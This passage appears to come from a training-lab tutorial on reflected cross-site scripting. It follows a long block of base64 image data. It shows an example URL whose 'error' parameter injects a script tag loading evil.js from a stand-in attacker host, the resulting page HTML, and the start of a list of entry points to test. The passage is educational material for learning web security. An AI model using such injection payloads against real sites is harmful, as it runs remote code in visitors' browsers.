5+A19Tj973L/WCKsO0FM4jEYsjMHeDzxFDM2xunf3e5cTzMORuBah9G2/fE2rQ/Q1wrETY/FL6Tj8EQxovTSIwQ6AbCjd5BXYCMQoIpfwr8hyAf8g0KFWUI+7AdLAduRDabj1zcsVGBgn5PJL59MWlIG1g9FoGWofuaBJRXpGBdb0s8teIGm0/Hl/0aMwroz0CCNvOvoCgnCj++F4Tz0/pjxsGCRg0c+VtS+hPWbZdg3PTesDT8xGkcRgh0A+FG9WhQlHkbUleX6nH/nLrQIP/6fnw87XmM++oWtAkXsMlkEVY/fxgHnvovlln8F19NjkJhJbM9fl2CF19+FxtOJFYPx62FWAa53BRyViaQsHlTOUyEeYbu1ifo5jgAb33wMno+GQxPv15YcKZILxSqMzMR0GoeLlcXXin2jXFDpxVCONIynP9oGDr5O8PGygauLQdi7oHUxlnlqsOY3twHPi6WMO1+r4ujApFfjkE7V2vYuD+JybtvNdrSF0lN9NcmxCcRSeUwlbN5Q+0t3TEYNl2nYv7YvugS4g2vTm/iR0PcVG3MCnRy7IYx4/ugU8cQNG83HGsulejzQJ8/zq/igMFNo4lYgHb+M3GG5bvm0kI84++Pvv+9jqwdYxDkw66p+QTsLaratn6YhS+WQm7lhjZDFmPNZAvs/XwfcvTlp0Pe2VUY2dEDtpY2cO8wBp+HlerT0+A5lbHY/VYfBDlZwcoxAH3nHKwR4lSDjKMLMbSdB+ys7eAa3Bfzf84DUR52jQ1ix5mCH4t/w4IufvDx8UePZWGGvH9wegSjrPD8Sgxu4QhrOx90n3ME2Q8wwKkiFWe3fIDRA97DiVo2mw4Zu9fiSIupmNS6ymxQbt2FJaIl+PqNn7DNezmWOq7H3vU5zM7WInbdK3hx5qc4GF3IljiP7IOuGW5UW5qFLI0j3Ky5+Vwn6mxc3r0UE7oHovlzK3HVfiheH+huKARC+YlbqBzeA0/3FiNr0yH89F0FpK1HYErXShx++2n4tXoOMz89iOjCxlddKgtDevAaHL8UjfPvSLFu8U4IX7aQPzUMA1UH8b8Ig0SWncK+k14YPDgQEtJA69gbiw/HILfkNq6u8MC+8W9jT4GhoOtDPhDrYpMR++WL1QF47qCNWoOJ76Vg2MF0FMRuQpubp/G4etyVEbFw+OAQLlwPw8d+P+DDjTeqGziVRqO02xZcuHId5/5jjs8mrsDVGsPM60L65AKcS0zEz7Nbw+2VbxCXnIzk2M0YbmvYoNHI0LJ9a+D6Nf0wcl36Nkx8aSNM3j6O9OIcnHtHhDVjF+M3dpOo/5xK/LpgGGaFd8PGqAIUxX+DrhemYtq2TP3wcu3NTzBi7H54LjqHzOICJB15F+3MtCCRI0Ztj2PH+QIv2DyFhReSkJyciNPvtdf3supLD5TnsOi1T6CdeQ7Zedew3PIKzpXWrAM6lMT/hPWzByPUryOm7ClChylj0LHmO3qaKGxcH41nZ4yARy210SLtaD683++OFk75uDH7MK4miuEzaDKet/gVi/sFIajX61ix9xr+yWGjjRBoCSysTKEozEOphqBTFyO3QAhrpdNXEOjKkZNRAVt3hwcET/onU4Er68agU0AHTNx5G6H/PoDYpAvYsWQCnqkRrEPa62k8O7sDun30BNwkKqScyIDOMhAD3lzDhDQZ4VvGwu3GJxjSqjl6z/gWCY3RadNnMHywOys9MZo90RFuqQlIEfaTP4VhAxU4+L/rekuq/PQ+nPQcjMHC8DGRLbpNmIZ+ze0hF5nAfcAr6G8dj2j9jg+LDqnHjyL2qYmY2sEaEsvWeH1Kvwaj4zUWafshGBrI8lJkh46d/JEWX8M6lz+Nl4Z6sjwQwWnAS+iWewxHYh/lWoxDYsF6E2UlKNXpkHVgO061eBNLRwbDUmIK32HTMVh3DIduVKe2bip/xY7dpRg2fw66ucggseuEGRNDcf7gGdbf0SJ6zw7E9JqHxYN8YCYSwdy3L4Y+49JAA68/PZqoI/ippD/eeC0Y5hI7dJ4+ofq5gy5tP94d0BLB/ZfgN+uh+PxSMqIOr8XsF1vCpkb7LzuxDl9rxmJ6v3ujuIjhNr0fuk3ugv7/9oVUmYlb51WQe3XH68t34+Ktm9g3qyUyt76K9oFdMG5DRK0PBfxTMEKg6ws3SlDeTkeRRTO4NNkI/X8mGhTcuoFU8kRo21CEhvjA/j4nsQgmrpZMENmcqxVrLITKQmWNbp4pnANbo01oW7RyrEB8TDpqGTMPQGRiAYs7Fo1MBqmWNTz9ghxPDRuI8oP7cUNTgTP7jsN98GAE6Ts/CtzcNRsvPMG6xkI3O3AUtmapUPlIlowOhXlFMHdxqfZLy13cYG9EDawPsblFjXCaUmjuxNNkiEztYHvnw4ISG9haFCKv4DGZ7o1AW1YKpaUVu24dcjNzob62En1aBiM4mE2tx+K7Yi2UDT1Qr8xB1u3b+H5yaNV+wS3QZVE4TDXlTPi1yM3Kg4OXJ6qj1TaK+tOjK8xHsb0rnA31R8TmXQwCTeVZiIstgnWwELK3DYJczYUYULWhLOxZewABUyaj3X0jX8SwdLPU72PK/stETEMKlAbXCkNmD98QIRRpGzTTJjPjoAh/3C216WBc86gn3KiyogKK3Dhcu3oVV8PikVepRm7sNcTf/gf3T6qxRr/VYUg8vwq96WfM6eaH5n1fx7JdvyGjOpwZQZVUoA9tqkvKR6FGBBlTFYmuBAknNuL90V3gH/wiPo5wwuit4Ug8PhvtHvFJoPypoRhYegD7r57Evp+bYfDgIHazZee/tQFTZl1F5/W/IUHoZsfvwFgX0d3GIyARQ0La6rjCDSOGvZMdVMXF1ZaQtqgQJY24yTwqpMhBzp0TqW4jp9gWDkLQYykzLrSVqDSsoopyVNybHmaN1h0XtLFUIvpaFBDSDi1kYji5OcOq/8e4EhODGP0Uj5TMKKzuVkPB6jqn1BmuzsGYtu+GYT82JaUjY/8kuDMjydnNEfmpaUIAwQcgvP1C9xy2/vSI7R1hW1aEYsO9jMrZvKE5S4Kn4H9xN7DnDV8kbhiJ1r4dMfydz3Hk5l3fsTZ6M9ZH9MH00Z51CA27YccXsr+EsvgCqIkZgHZy1tlMw/lvFmNCryD495yP09Jn8cmvSbi8tDvMDXv+kzBOoB8YblQEW9926NChQ9XUPhCOMhM4N2+HQKf7bp3/UFi306srXlu8ExcTr2PX635I2vAqxn+eyCppFbpzv2DvxKP4YcIl5Gnl8OrVDLrzC/HSW/tR3vkDHIuLxYkNczC8nfPdobi6SqhUSqg0rOUxsVEpVVAL841B3hlDBxZjz7srccRtMAZXmc9MqEpRLvdCy0A7SFlzyz68DYeyalucIjt/+NvewPnfimsL9wMRw7PvQDS//D0OCMeiPBzdcwJFjUwqadT6a9Ow1k8aFZQqNl87SQ9GfRab119hQlOBmK834ZRLX/RvLoHY0R++8ihcjhRuGWW4vO9YlfunGnZTcbRDSUw0Mhp9IxJgQqjTQF2Whcgf5uOtL8swbPpQuIjEaDZoNJ76dTUWHk5hNwPWSypOwtldh3Cj2o55wDlNOmPUcBW2LtyAsAK2QqdATuQh7D0n+KAlaDl8FIJOLseCgylQsOMqU09h//mc6rolfKbMyTYVUTdrvuhWf3qkIQPQz+IkfjgtPFjWIvWHvbhQ8wGg1AGtX3wb647cRMKZ5eiDE3h/6Fz8pN+mAqc/34yK0TMw0PY+25qhw+21P2LfrB+xd2katHI3+Dwtw81Px2LS1nQET9+LG4nnsf3Dseji8di/q/7XQRjq3WjqCTdaC10xJUdEUurdb2Fx6qQq9KIuXvg81kJaNexnOtZ1NS01X00bXo+kfOHrVpVq4QtLD0S592UyqzJuDZOUms+9pA+1qU1aQ12dxtKPhriSleH/obZ+b9LpGgdUnppB3hIZdVgaXRWGVECXTUfn9aGWQW2pS/ceNGj6bBrm34LevVgzgGclJe54jdo4mpO5pStNEL6xxa4necNQCvD2Jm9nCxKb2pMHm/ftvIB+05+znCI3jKEnWrSmJ5/qTi+/0ps8W83Tf16pftR0aoYnsdvH3esUO9KEI1VxQUu+eZFsBmwyhNPUUtranmSrD8dKpLm5nJ506k9Tpj1NnraW5NBiCK36tcjwaSUVRX0xnFp4BlLH7s/RG/8eRS19a+ePLvcYze3uQ07Ozcjd71X6trChOl1IWweZkmCuSuS25NVhMM35LkaITmpASzmnV9LIJ7zIzsqKbF2DqfurX1J4Y85ZcZN2zupLwc7WZGnlQN7tB9H7hzINbVBNqQfn04uhbmRjZUPOQb3pvWO3a3xCil3rlyOotZsTubp70dOLrxjCsdaXHh0VXviIBrdtQW07daY+r42kLnZdaU19sVHVKn191eVso8FuPeizOrZVfL2TFmMxbX/7NO3wWUZLHD6nPWuz9PtpDCF/OVXwWBxNAEq4gM0tj6No4hi8td5P72bgPB6E1+y69IzDgpTNGNhUX5v+26FFzMpn0Cfi37i+Y9h9g5WE1+xWv5aEoN3v4uURvIddH4/pEQ2Hw+EYoCLkOwzBJ/MHPaaRpP9cuEBzOJzHi8gBT096F8Nb8C7Lo8JdHBwOh9NE4Rb074CuTIHyHAXURj3553A4nNpwgX4UNJk40XIxFrc+hexqMdYhZ+UWfOyxBeciGvseGIfD4dyPcQJdX7hRbQESr13FVWGgin4KQ3ze38CE1CXhsx7uGPpNrv79Lg6Hw/mjMMIHTVBmxyKmyAoBAc1gritBRkIylM4tEOhoUiXQ1/Nh08of9vr3xISIXmzS7/vXRX1xDtq9Uo7/i1yLXvcOZRIs6DabcEHyDF6/1hOuf3aMTw6H87fCCAu6MeFGheGkYojFwvTXEWdV9mXsXjoe/WbsRbHhNz1UhMNrd8JiwlR0N4gzpcfiWLc1WG6xGhvfjEFJjZFnukvHsVa2EAtFbJJ9jpNX77g4KhE3bhUWmW7DlYyq+6Him91YLlmB73aV8xCLHA6nTh7ZB10z3CioDJkx1xF5PRrxqXmoaMpqQxVIPbsFH4x6En6tR2FDUgDGj+9eK7qaLnUn1p5oh2kTWhoGj6gRP/8gLp5TwLpfK7jERCAq4a6fWezXCn02vYAeg6zuuTnJ4P28L+SVQsQuYRysBumn0lFp6onAXhY8xCKHw6kTIwS6gXCjYnM4+fgjIJCJjK8L5OXpSEgrqmFdNxUIeaeWYWjbQDwz+yg0PZfidGIcTm56H6M6ONXIkEpc++oLJA6ageGuBrmtzMGtX8oBz7Z4bvcADNrTG4EWVav0OLoh+NVQBIWa3td7kPcMhLe5GmmnMqCtzEbyWQXEnYLg78TW8RCLHA6nDowQ6PrCjQqrTWFtZwUzuRymlg7w9LCHqLgI5U3uyRpBlZuAmzly+IcKoRJbwtO6jmwoOYa126V4bXqvu5/pISWURQSxtwNshRGqNvawd26kI8fBH4FdJCj/JRk5cSlISQbcBvjDquapeYhFDodTAyMEmlFPuNH7EEImNknEcB+xGTfijmFe+wJ890ZH+LQehDc/3ofw3DuhunRI270Wx1pNw6SQGk/+2E3I1EYEul2GCqHboCpDWWHVqgYRWcB/YDOIEpjw7kxCDpwR8Kyd3tImHmKRw+HUgXEC/cBwo2xVRREKSpWo1GqhUZUgO7MAOitrWDRRnRZbB6Lf1NXYF8GEcP1w2F39CEOnfwv95980kdi4PgYDZ4yAey0L1wU+Xc1B8eE4tSwCV+eeRWxhtQMexWciEfF1BOIilCBmbecciED41kikpAjbiGDzbBBckYEra9Og82MWdQshc7Q8xCKHw6kT44Z6a4qQGpeKfKVW/6UOezcveDiY6lVeW5KO+NR8KNRakFgGcxtneHi6wPIv9OqZprISEpkM5UdfR+u5bvjh8qL7vgRBqTE4OvIwrl3TwH5Ia9hfuoJYM+E1u24oHLsS3+2+5+meSIpWe+Zi+DB2G9Pk4HSHDTgTSbCdOQ4zPvWuurmx84rZeZtqn4PD4fw58Fgc90KZ2DyoI3Y/fxFHp9T1JQgOh8P5Y+D6cy+KXJg+swLLxnBx5nA4fy7cguZwOJwmCjcSORwOp4nCBZrD4XCaKFygORwOp4linA9aCDealoLMwgpoRDJYOHjAx922eqAKqYuRmZqB/FIltGI5rJv5w8/p/mHPHA6Hw2mYxxdulBTIjo1DobknvN2sYaJTQ6GVwcqcf7WXw+FwHgYjXBz1hxulinzka+z1MTjMZVJI5eZcnDkcDucReGQf9J1woxqFApVyMcqSoxERHo7Im0nIKfsbfFGFw+Fw/iSMEOj6w43qtFpQWSEU1r4ICW2NAHstspOzUHo3XDKHw+FwjMAIga4/3KjwFRXIbOHsYAaJSAJzRwdYaspQpuLjYDgcDudhMM7FUU+4UalczoTZsJ0Af3WDw+FwHgnjBLqecKMiC1tY64pwu1AFwemhzCtAmdQSlnKu1BwOh/MwPLZwo/rVpVlISctFiYogkVvDxcsbLpaCfHM4HA7HWHiwJA6Hw2miGOfi4HA4HM4fBhdoDofDaaJwgeZwOJwmCfD/4EecUR31jeEAAAAASUVORK5CYII=)

The application doesn't check the contents of the error parameter, which allows the attacker to insert malicious code. 

html
hhtps://website.thm/?error=<script>src="https://attacker.thm/evil.js"></script>

html
<div class = "alert alert-danger"> 
	<p><script src="https://attacker.thm/evil.js"></script></p> 
</div>

How to test for Reflected XSS:

You'll need to test every possible point of entry; these include:

  • Parameters in the URL Query String 
  • URL File Path 
  • Sometimes HTTP Headers (although unlikely exploitable in practice